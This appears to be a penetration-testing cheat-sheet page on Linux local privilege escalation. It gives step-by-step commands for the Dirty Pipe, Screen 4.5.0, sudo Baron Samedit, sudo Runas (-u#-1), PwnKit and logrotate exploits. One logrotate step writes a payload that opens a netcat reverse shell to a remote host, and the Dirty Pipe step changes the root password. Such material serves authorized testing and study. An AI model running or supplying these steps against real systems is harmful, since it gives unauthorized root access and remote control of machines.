Linux
Index
Dirty Pipe
Exploit kernel from 5.8 to 5.17
sudo apt-get install gcc
chmod +x compile.sh
./compile.sh
./exploit-1
# change the root password in the /etc/passwd file and get an elevated shell.
Screen 4.5.0
chmod +x 41154.sh
./41154.sh
Sudo - Baron Samedit
Exploit sudo 1.8.21 | 1.8.31 | 1.8.27 | 1.9.2 | other
Sudo - Runas ALL
Exploit sudo < 1.8.28
Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value ALL
in the Runas specifier.
ex. alice myhost = (ALL) /usr/bin/id
If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction.
ex. bob myhost = (ALL, !root) /usr/bin/vi
sudo -u#-1 vi
sudo -u#4294967295 vi
PwnKit - Polkit
Exploit1 / Exploit2 Polkit < 0.105-26
pkexec --version
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
Logrotate
Exploit Logrotate 3.8.6 | 3.11.0 | 3.15.0 | 3.18.0
You have to find log files on which logrotate is run and on which you have write permissions. Then run exploit on the writable log file.
gcc -o logrotten logrotten.c
Prepare payload
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile
If "create"-option
is set in logrotate.cfg:
./logrotten -p ./payloadfile /tmp/log/pwnme.log
If "compress"-option
is set in logrotate.cfg:
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
Last updated
Was this helpful?